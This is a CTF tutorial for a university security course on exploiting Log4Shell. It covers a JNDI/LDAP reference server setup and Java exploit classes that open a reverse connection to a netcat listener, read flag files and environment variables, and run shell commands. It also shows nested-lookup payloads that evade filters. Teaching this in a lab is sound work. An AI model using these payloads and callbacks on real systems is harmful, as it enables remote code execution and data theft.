Log4Shell Exploitation Guide: Capture the Flag for CS6035 Fall 2025

Step-by-step tutorial to exploit Log4Shell vulnerability in a CTF environment. Learn JNDI injection, LDAP reference server setup, and flag extraction for CS6035 Fall 2025.


Introduction to Log4Shell and the CTF Assignment

Log4Shell (CVE-2021-44228) is a critical remote code execution vulnerability in Apache Log4j, a widely used Java logging library. In this Capture the Flag (CTF) assignment for CS6035 Fall 2025, you will exploit a deliberately vulnerable web application to retrieve flags. This tutorial covers the first six required flags, providing hints and techniques without giving away the exact solutions. By the end, you'll understand JNDI injection, LDAP servers, and malicious payload delivery.

Understanding the Vulnerability

Log4j supports message lookup substitution using ${prefix:name} syntax, such as ${java:version} or ${env:USER}. The vulnerability arises when user-controlled input that is logged contains a JNDI lookup like ${jndi:ldap://attacker.com/a}. Log4j performs the lookup by contacting the attacker's LDAP server, which answers with a JNDI reference naming a remote codebase and class; the victim JVM downloads that class and instantiates it, so any code in its static initializer runs with the web application's privileges. For a real-world analogy, think of a smart home assistant that executes commands from any spoken phrase: if an attacker whispers a malicious command, the assistant runs it without verification.

Setting Up the Exploitation Environment

You'll need four terminal windows running simultaneously for the environment itself, plus a fifth for the netcat listener from Flag 2 onward. Follow these steps carefully.

Step 1: User Authentication and Container Start

Switch to the log4j user and start the container:

su - log4j
cd ~
./StartContainer.sh

Ensure the container starts without errors.

Step 2: Log Monitoring

In a second terminal, monitor logs:

cd Desktop/log4shell/logs
tail -f cs6035.log

If the output stops updating, the log file was rotated; rerun the command (or use tail -F, which follows the file by name across rotations).

Step 3: LDAP Reference Server

In terminal three, start the LDAP server:

cd ~/Desktop/log4shell/target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://172.17.0.1:4242/#Exploit"

LDAPRefServer listens on port 1389 by default. Whenever a victim resolves a ${jndi:ldap://...} lookup against it, it answers with a reference whose codebase is the part of the argument before the '#' (your HTTP server) and whose class name is the fragment after it (Exploit), so Log4j then fetches Exploit.class from your HTTP server.

Step 4: Malicious Payload Server

In terminal four, serve your exploit class:

cd <flag-specific-directory>
python3 -m http.server 4242

Place your compiled .class file in this directory; its name must match the fragment you gave LDAPRefServer (Exploit.class for #Exploit). The port must match the codebase URL passed to the LDAP server (4242 above), not the LDAP server's own port.
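Port and name mismatches between the three pieces are the most common reason a lab payload never runs. The following script is an added example, not part of the original tutorial or of marshalsec: it parses the codebase argument the way LDAPRefServer does (codebase before '#', class name after), checks that python3 -m http.server is on the port the codebase names, that the class file is actually in the served directory, and that the class file's major version is one the container's JVM can load. It assumes the LDAPRefServer default port of 1389 and a Java 8 JVM in the container (class-file major 52); adjust both constants if your lab differs. The class bytes in the demo are constructed, not a real compiled class.

```python
"""Sanity-check the Log4Shell lab pieces before submitting a payload.

Added example; not part of the tutorial and not marshalsec's code.
Assumptions: LDAPRefServer listens on 1389, the container JVM accepts
class files up to major version 52 (Java 8).
"""
import os
import struct
from urllib.parse import urlsplit

LDAP_PORT = 1389      # assumption: marshalsec LDAPRefServer default listen port
TARGET_MAJOR = 52     # assumption: container runs Java 8 (class-file major 52)


def parse_codebase(codebase):
    """Split "http://host:port/#Class" into (host, port, class_name).

    LDAPRefServer sends the part before '#' as javaCodeBase and the
    fragment as the factory class name the victim JVM will load.
    """
    u = urlsplit(codebase)
    if u.scheme != "http" or not u.hostname or not u.fragment:
        raise ValueError("codebase must look like http://host:port/#ClassName")
    return u.hostname, u.port or 80, u.fragment


def class_major_version(data):
    """Return the major version from class-file bytes (52 = Java 8, 61 = Java 17)."""
    if len(data) < 8 or data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    _minor, major = struct.unpack(">HH", data[4:8])
    return major


def check_setup(codebase, http_port, served, target_major=TARGET_MAJOR):
    """Return a list of problems; an empty list means LDAP, HTTP and class agree.

    `served` maps file name -> file bytes for the directory http.server serves.
    """
    _host, port, cls = parse_codebase(codebase)
    problems = []
    if port != http_port:
        problems.append(f"http.server listens on {http_port} but the codebase says {port}")
    if http_port == LDAP_PORT:
        problems.append(f"HTTP server must not share port {LDAP_PORT} with the LDAP server")
    data = served.get(f"{cls}.class")
    if data is None:
        problems.append(f"{cls}.class is not in the served directory")
    else:
        major = class_major_version(data)
        if major > target_major:
            # The victim JVM would throw UnsupportedClassVersionError and nothing runs.
            problems.append(f"{cls}.class is major {major}; compile with javac --release 8")
    return problems


def load_served(directory):
    """Read the served directory into the mapping check_setup expects."""
    served = {}
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                served[name] = fh.read()
    return served


def jndi_payload(host, ldap_port=LDAP_PORT, path="a"):
    """The string to submit. LDAPRefServer does not pick the class from this
    path; the class name comes from the codebase fragment."""
    return f"${{jndi:ldap://{host}:{ldap_port}/{path}}}"


if __name__ == "__main__":
    # Constructed sample: a Java-8 class-file header, which is all the check reads.
    served = {"Exploit.class": b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + b"\x00" * 8}
    print(check_setup("http://172.17.0.1:4242/#Exploit", 4242, served))  # []
    print(jndi_payload("172.17.0.1"))  # ${jndi:ldap://172.17.0.1:1389/a}
```

For a real run, replace the constructed mapping with load_served("<flag-specific-directory>") and pass the port you gave http.server; any non-empty list tells you which terminal to fix before you waste time re-submitting payloads.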

Flag 1: Introduction Flag

This flag is a warm-up. You need to trigger a simple JNDI lookup. Craft a payload such as ${jndi:ldap://your-ip:1389/flag1} (your-ip is the address the container can reach you on, 172.17.0.1 in the setup above) and submit it through any input the application logs, for example a search box or the User-Agent header. The LDAP server answers with a reference to the class named in its codebase argument, and the victim JVM loads that class; anything in its static initializer runs at that moment, so a class that simply outputs a string is enough here. Watch the log and the LDAP server's terminal to confirm the lookup arrived and the flag appears.

Flag 2: Network Listener Flag

For this flag, you must set up a netcat listener to receive a reverse connection. In terminal five, run:

nc -nlvp 4444

Your exploit class should connect back to this listener. Use Java code like:

import java.io.*;
import java.net.*;

// Loaded by the victim JVM as the JNDI object factory; the static initializer
// runs as soon as the class is loaded, before any factory method is called.
public class Exploit {
    static {
        // Connect back to the netcat listener started in terminal five.
        try (Socket s = new Socket("172.17.0.1", 4444);
             PrintWriter out = new PrintWriter(s.getOutputStream(), true)) {
            out.println("Flag2: ...");
        } catch (Exception e) {
            // Fail quietly so the victim's lookup does not surface an error.
        }
    }
}

Compile with javac Exploit.java and serve the class. If your JDK is newer than the container's JVM, compile with javac --release 8 Exploit.java so the class file is a version the target can load; otherwise the load fails with UnsupportedClassVersionError and nothing runs. When the web app logs your payload, the class executes and sends the flag to your listener.

Flag 3: File Read Flag

You need to read a file from the server, e.g., /home/log4j/flag3.txt. Modify your exploit class to read the file and output its content. Use standard Java file I/O:

// Read the first line of the flag file; try-with-resources closes the reader (java.io.*).
try (BufferedReader br = new BufferedReader(new FileReader("/home/log4j/flag3.txt"))) {
    String line = br.readLine();
    // Send to listener or print via log
}

Since the exploit runs inside the web application's JVM, you can read any file that user can read. Return the flag content via log output or send it to your listener as in Flag 2.

Flag 4: Environment Variable Flag

This flag is stored in an environment variable, e.g., FLAG4. In your exploit class, use System.getenv("FLAG4") to retrieve it. Then output it similarly to Flag 3. For example:

String flag = System.getenv("FLAG4");
// Print to log or send to listener

Remember that System.getenv reads the environment of the web application's JVM process, so a variable only shows up if it was set for that process (or its container), not for your own shell.

Flag 5: RCE and Command Execution Flag

You need to execute a shell command to get the flag. For instance, run cat /home/log4j/flag5.txt. Use Runtime.getRuntime().exec() in your exploit:

// Run the command with the web app's privileges and capture its standard output.
Process p = Runtime.getRuntime().exec("cat /home/log4j/flag5.txt");
try (BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
    String flag = reader.readLine();
    // Send to listener
}

Ensure you handle the process output correctly: read stdout (and stderr if the command fails), and remember that exec does not go through a shell, so pipes, redirection and globbing in the command string are not interpreted. This simulates a real RCE scenario.

Flag 6: Chained Exploit Flag

This flag requires chaining multiple lookups or using a more complex payload. Log4j resolves the innermost ${...} first and then re-examines the result, and ${env:NAME:-default} yields default when NAME is unset. That is why a payload such as ${${env:NOTSET:-j}ndi:ldap://...} still works against a filter that only looks for the literal string ${jndi:, since the filter never sees it; the page's ${${env:FLAG6:-${jndi:ldap://...}}} uses the same default syntax. You may also need to combine a file read and an environment variable. Experiment with nested lookups. The key is to understand how Log4j processes multiple substitutions.

Debugging and Troubleshooting

Common issues include port mismatches, IP address errors, and serving the class file from the wrong directory. Watch the LDAP server's terminal to see whether it receives a request at all: no request means the payload was never logged or never resolved; a request with no following HTTP GET means the codebase URL or port is wrong; a GET that fails means the class name or file is wrong. Try a simple lookup like ${java:version} first to confirm the vulnerability works before adding the JNDI part.

Connecting to Current Trends

Log4Shell is a prime example of how a seemingly minor logging feature can lead to catastrophic breaches: any string that reaches a log line, whether a search query, a User-Agent header or a chat message, becomes attacker-controlled input. It is comparable to a single misconfigured API in a popular AI app exposing user data, or to an exploit in a game's chat system that lets attackers run code on players' machines. Understanding this vulnerability is crucial for modern cybersecurity, especially as cloud services and microservices rely heavily on logging.

Conclusion

By completing these flags, you've gained hands-on experience with one of the most impactful vulnerabilities of the decade. Remember to use this knowledge ethically and only on systems you own or have permission to test. For the extra credit flag (Flag 7), explore bypassing WAF filters or using different JNDI protocols like RMI.